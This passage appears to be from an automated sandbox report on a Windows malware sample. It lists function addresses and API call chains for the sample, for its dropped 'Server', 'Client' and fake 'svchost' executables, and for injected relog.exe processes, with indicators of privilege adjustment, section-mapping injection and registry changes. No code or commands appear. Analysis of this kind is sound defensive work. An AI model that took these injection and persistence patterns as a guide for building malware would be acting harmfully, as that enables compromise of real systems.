                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE4883E8 RtlAdjustPrivilege,NtSetInformationProcess,RtlAdjustPrivilege,NtSetInformationProcess,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,Sleep,53_2_00007FF7AE4883E8
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE4832A8 GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError,OpenProcess,GetCurrentProcess,DuplicateHandle,53_2_00007FF7AE4832A8
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C32A8 GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError,OpenProcess,GetCurrentProcess,DuplicateHandle,55_2_00007FF7C07C32A8
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C83E8 RtlAdjustPrivilege,NtSetInformationProcess,RtlAdjustPrivilege,NtSetInformationProcess,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,Sleep,55_2_00007FF7C07C83E8
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C3614 wcsnlen,GetModuleHandleA,GetProcAddress,NtMapViewOfSection,ResumeThread,55_2_00007FF7C07C3614
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C3574 NtCreateSection,NtClose,55_2_00007FF7C07C3574
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1832A80_2_00007FF68A1832A8
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1878F00_2_00007FF68A1878F0
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A182DBC0_2_00007FF68A182DBC
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1993580_2_00007FF68A199358
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1924300_2_00007FF68A192430
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1A14D80_2_00007FF68A1A14D8
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A18FCE80_2_00007FF68A18FCE8
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A198D340_2_00007FF68A198D34
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1909EC0_2_00007FF68A1909EC
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1829C80_2_00007FF68A1829C8
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A185AC00_2_00007FF68A185AC0
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1A0B240_2_00007FF68A1A0B24
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1A42F80_2_00007FF68A1A42F8
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1A07740_2_00007FF68A1A0774
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1A2FD80_2_00007FF68A1A2FD8
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A193FC80_2_00007FF68A193FC8
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1A382C0_2_00007FF68A1A382C
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1888780_2_00007FF68A188878
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1820C00_2_00007FF68A1820C0
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A19F1000_2_00007FF68A19F100
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1946180_2_00007FF68A194618
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1926C80_2_00007FF68A1926C8
                      Source: C:\Windows\explorer.exeCode function: 2_2_08B9AD082_2_08B9AD08
                      Source: C:\Windows\explorer.exeCode function: 2_2_08B9184C2_2_08B9184C
                      Source: C:\Windows\explorer.exeCode function: 2_2_08B931F02_2_08B931F0
                      Source: C:\Windows\explorer.exeCode function: 2_2_08B97EE42_2_08B97EE4
                      Source: C:\Windows\explorer.exeCode function: 2_2_08B90A7C2_2_08B90A7C
                      Source: C:\Windows\explorer.exeCode function: 2_2_08CB167C2_2_08CB167C
                      Source: C:\Windows\explorer.exeCode function: 2_2_08CB244C2_2_08CB244C
                      Source: C:\Windows\explorer.exeCode function: 2_2_08CB3DF02_2_08CB3DF0
                      Source: C:\Windows\explorer.exeCode function: 2_2_08CBB9082_2_08CBB908
                      Source: C:\Windows\explorer.exeCode function: 2_2_08CB8AE42_2_08CB8AE4
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C3696E02_2_0C3696E0
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C370C282_2_0C370C28
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C37A4102_2_0C37A410
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C3684782_2_0C368478
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C37AC642_2_0C37AC64
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C373CF42_2_0C373CF4
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C378DB82_2_0C378DB8
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C36E5C02_2_0C36E5C0
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C368ED82_2_0C368ED8
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C36DEC42_2_0C36DEC4
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C37BFF02_2_0C37BFF0
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C370FD82_2_0C370FD8
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C3690D42_2_0C3690D4
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C3539202_2_0C353920
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C37C9792_2_0C37C979
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C3789402_2_0C378940
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C3542002_2_0C354200
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C373A5C2_2_0C373A5C
                      Source: C:\Windows\explorer.exeCode function: 2_2_0C37831C2_2_0C37831C
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3C45202_2_0F3C4520
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3E8F1C2_2_0F3E8F1C
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3C4E002_2_0F3C4E00
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3E465C2_2_0F3E465C
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3ED5792_2_0F3ED579
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3E95402_2_0F3E9540
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3D9CD42_2_0F3D9CD4
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3ECBF02_2_0F3ECBF0
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3E1BD82_2_0F3E1BD8
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3DA2E02_2_0F3DA2E0
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3D9AD82_2_0F3D9AD8
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3DEAC42_2_0F3DEAC4
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3E99B82_2_0F3E99B8
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3DF1C02_2_0F3DF1C0
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3E18282_2_0F3E1828
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3EB0102_2_0F3EB010
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3D90782_2_0F3D9078
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3EB8642_2_0F3EB864
                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3E48F42_2_0F3E48F4
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeCode function: 5_2_00007FFD9B5F0D355_2_00007FFD9B5F0D35
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeCode function: 5_2_00007FFD9B5F31315_2_00007FFD9B5F3131
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeCode function: 6_2_008663906_2_00866390
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeCode function: 6_2_00865AC06_2_00865AC0
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeCode function: 6_2_008697586_2_00869758
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeCode function: 6_2_008697606_2_00869760
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeCode function: 6_2_008657786_2_00865778
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeCode function: 6_2_051105FF6_2_051105FF
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeCode function: 6_2_051106006_2_05110600
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeCode function: 6_2_0511C1086_2_0511C108
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeCode function: 6_2_0511C0F76_2_0511C0F7
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeCode function: 6_2_05115D526_2_05115D52
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeCode function: 6_2_05115D606_2_05115D60
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeCode function: 9_2_00C663909_2_00C66390
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeCode function: 9_2_00C65AC09_2_00C65AC0
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeCode function: 9_2_00C697509_2_00C69750
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeCode function: 9_2_00C697609_2_00C69760
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeCode function: 9_2_00C657789_2_00C65778
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeCode function: 9_2_057A05F09_2_057A05F0
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeCode function: 9_2_057A06009_2_057A0600
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeCode function: 9_2_057AC1089_2_057AC108
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeCode function: 9_2_057AC0F79_2_057AC0F7
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeCode function: 9_2_057A5D609_2_057A5D60
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeCode function: 9_2_057A5D529_2_057A5D52
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0113D6B010_2_0113D6B0
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_01133C9810_2_01133C98
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_01136FD310_2_01136FD3
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0113707310_2_01137073
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_011370A210_2_011370A2
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0113F3C910_2_0113F3C9
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_011387D710_2_011387D7
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_011387D810_2_011387D8
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0113D6AF10_2_0113D6AF
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_011319D010_2_011319D0
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_011319C010_2_011319C0
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_01133C8910_2_01133C89
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0113EF7F10_2_0113EF7F
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0555098810_2_05550988
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0555C25810_2_0555C258
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0555C24810_2_0555C248
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0555097910_2_05550979
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0555563010_2_05555630
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0555562010_2_05555620
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0555FB5810_2_0555FB58
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0570CEA910_2_0570CEA9
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_057041D810_2_057041D8
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_057029BB10_2_057029BB
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0570004010_2_05700040
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_05704BC210_2_05704BC2
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0570C20710_2_0570C207
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0570F20810_2_0570F208
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_05705C6010_2_05705C60
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0570619810_2_05706198
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0570003910_2_05700039
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0570E02810_2_0570E028
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0570E01810_2_0570E018
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_05706BC010_2_05706BC0
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_05706BB210_2_05706BB2
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_05712C1010_2_05712C10
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_05714B0810_2_05714B08
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_05712EEF10_2_05712EEF
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0571344110_2_05713441
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0571004010_2_05710040
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_05712C0010_2_05712C00
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_057147C010_2_057147C0
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_057147BA10_2_057147BA
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_0571064210_2_05710642
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_05714AF910_2_05714AF9
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeCode function: 10_2_057112D810_2_057112D8
                      Source: C:\ProgramData\KMSAuto\accc.exeCode function: 11_2_00007FFD9B5D0D3511_2_00007FFD9B5D0D35
                      Source: C:\ProgramData\KMSAuto\accc.exeCode function: 11_2_00007FFD9B5D0FA911_2_00007FFD9B5D0FA9
                      Source: C:\ProgramData\KMSAuto\accc.exeCode function: 11_2_00007FFD9B5D1E5011_2_00007FFD9B5D1E50
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeCode function: 14_2_010F495814_2_010F4958
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeCode function: 14_2_010F408814_2_010F4088
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeCode function: 14_2_010F5B2014_2_010F5B20
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeCode function: 14_2_010F3D4014_2_010F3D40
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeCode function: 19_2_00007FFD9B5F31C519_2_00007FFD9B5F31C5
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeCode function: 19_2_00007FFD9B5F2AFD19_2_00007FFD9B5F2AFD
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeCode function: 20_2_011CDC7420_2_011CDC74
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_04D2408824_2_04D24088
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_04D2B27024_2_04D2B270
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_04D2CFE824_2_04D2CFE8
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_04D2495824_2_04D24958
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_04D25B2024_2_04D25B20
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_04D2CC7824_2_04D2CC78
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_04D2CC6724_2_04D2CC67
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_04D23D4024_2_04D23D40
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_04D2CFD924_2_04D2CFD9
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06B3458824_2_06B34588
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06B3422824_2_06B34228
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06B3421824_2_06B34218
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06B341E024_2_06B341E0
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06D1DFA024_2_06D1DFA0
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06D1C4D824_2_06D1C4D8
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06D19C5824_2_06D19C58
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06D132D824_2_06D132D8
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06D1F3A024_2_06D1F3A0
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06D17B0824_2_06D17B08
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06D1673824_2_06D16738
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06D1914024_2_06D19140
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06D5D45024_2_06D5D450
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_06D5D44024_2_06D5D440
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_0715379824_2_07153798
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_0715378824_2_07153788
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_071D5F4024_2_071D5F40
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_071D9BA024_2_071D9BA0
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_074783E024_2_074783E0
                      Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_0747F96024_2_0747F960
                      Source: C:\ProgramData\KMSAuto\accc.exeCode function: 32_2_00007FFD9B5E0D3532_2_00007FFD9B5E0D35
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA34935847_2_00007FF6AA349358
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA34243047_2_00007FF6AA342430
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA348D3447_2_00007FF6AA348D34
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA3514D847_2_00007FF6AA3514D8
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA33FCE847_2_00007FF6AA33FCE8
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA3329C847_2_00007FF6AA3329C8
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA3409EC47_2_00007FF6AA3409EC
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA3332A847_2_00007FF6AA3332A8
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA3542F847_2_00007FF6AA3542F8
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA350B2447_2_00007FF6AA350B24
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA335AC047_2_00007FF6AA335AC0
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA35077447_2_00007FF6AA350774
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA35382C47_2_00007FF6AA35382C
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA343FC847_2_00007FF6AA343FC8
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA352FD847_2_00007FF6AA352FD8
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA33887847_2_00007FF6AA338878
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA34F10047_2_00007FF6AA34F100
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA3320C047_2_00007FF6AA3320C0
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA3378F047_2_00007FF6AA3378F0
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA34461847_2_00007FF6AA344618
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA332DBC47_2_00007FF6AA332DBC
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA3426C847_2_00007FF6AA3426C8
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B032A852_2_00007FF7C9B032A8
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B029C852_2_00007FF7C9B029C8
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B02DBC52_2_00007FF7C9B02DBC
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B078F052_2_00007FF7C9B078F0
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B05AC052_2_00007FF7C9B05AC0
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B242F852_2_00007FF7C9B242F8
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B109EC52_2_00007FF7C9B109EC
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B214D852_2_00007FF7C9B214D8
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B0FCE852_2_00007FF7C9B0FCE8
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B1243052_2_00007FF7C9B12430
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B1935852_2_00007FF7C9B19358
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B20B2452_2_00007FF7C9B20B24
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B126C852_2_00007FF7C9B126C8
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B1461852_2_00007FF7C9B14618
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B18D3452_2_00007FF7C9B18D34
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B020C052_2_00007FF7C9B020C0
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B1F10052_2_00007FF7C9B1F100
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B0887852_2_00007FF7C9B08878
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B2382C52_2_00007FF7C9B2382C
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B22FD852_2_00007FF7C9B22FD8
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B13FC852_2_00007FF7C9B13FC8
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B2077452_2_00007FF7C9B20774
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE4A077453_2_00007FF7AE4A0774
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE4A2FD853_2_00007FF7AE4A2FD8
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE493FC853_2_00007FF7AE493FC8
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE48887853_2_00007FF7AE488878
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE4A382C53_2_00007FF7AE4A382C
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE4878F053_2_00007FF7AE4878F0
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE49F10053_2_00007FF7AE49F100
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE4820C053_2_00007FF7AE4820C0
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE498D3453_2_00007FF7AE498D34
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE482DBC53_2_00007FF7AE482DBC
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE49461853_2_00007FF7AE494618
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE4926C853_2_00007FF7AE4926C8
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE49935853_2_00007FF7AE499358
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE4A0B2453_2_00007FF7AE4A0B24
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE49243053_2_00007FF7AE492430
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE48FCE853_2_00007FF7AE48FCE8
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE4A14D853_2_00007FF7AE4A14D8
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE4909EC53_2_00007FF7AE4909EC
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE4829C853_2_00007FF7AE4829C8
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE4A42F853_2_00007FF7AE4A42F8
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE4832A853_2_00007FF7AE4832A8
